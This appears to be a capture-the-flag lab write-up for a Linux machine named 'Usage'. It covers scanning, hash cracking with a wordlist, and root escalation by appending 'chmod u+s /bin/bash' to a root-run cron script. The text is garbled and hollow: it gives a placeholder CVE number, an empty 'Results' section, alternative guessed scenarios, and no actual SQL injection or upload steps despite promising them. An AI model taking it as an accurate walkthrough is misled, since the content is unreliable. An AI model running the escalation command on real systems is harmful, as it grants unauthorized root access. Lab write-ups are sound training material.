Usage is a medium-difficulty Linux machine that begins with a web application running a "Bug Bounty" platform. The initial foothold involves discovering a Blind SQL Injection vulnerability in a search parameter, leading to the extraction of admin credentials. After cracking the hash, we log in to find a file upload feature vulnerable to a PHP vulnerability (CVE-2023-XXXX affecting specific image handlers). Privilege escalation involves discovering a hardcoded database password reused by a system user, followed by exploitation of a specific cron job or binary with elevated privileges.

We start with an nmap scan to identify open ports.

nmap -sC -sV -oA usage 10.10.11.18

Results:

We save the hash into hash.txt and crack it using Hashcat.

hashcat -m 3200 hash.txt /usr/share/wordlists/rockyou.txt

Login: We log into the Admin dashboard at http://usage.htb/admin using the cracked credentials.

Now logged in as dash, we enumerate the system.

Internal Port Scanning / Services: We notice a service running internally or a scheduled task.

ps aux | grep root

Key Finding: We find a binary or script with special permissions.

Scenario A: Cronjob / Backup Script We inspect /var/spool/cron/crontabs or look at running processes. There is a script running as root that processes files in a directory we can write to.

Scenario B: Systemctl / Service If we have sudo -l permissions allowing us to restart a service, we can inject code.

The Exploit:

Alternatively: We find we can write to a configuration file that is read by a root cronjob.

echo "chmod u+s /bin/bash" >> /opt/scripts/cron_config.py

Wait for the cron to execute.

Once we have root access (e.g., /bin/bash -p):

id
uid=0(root) gid=0(root) groups=0(root)
cat /root/root.txt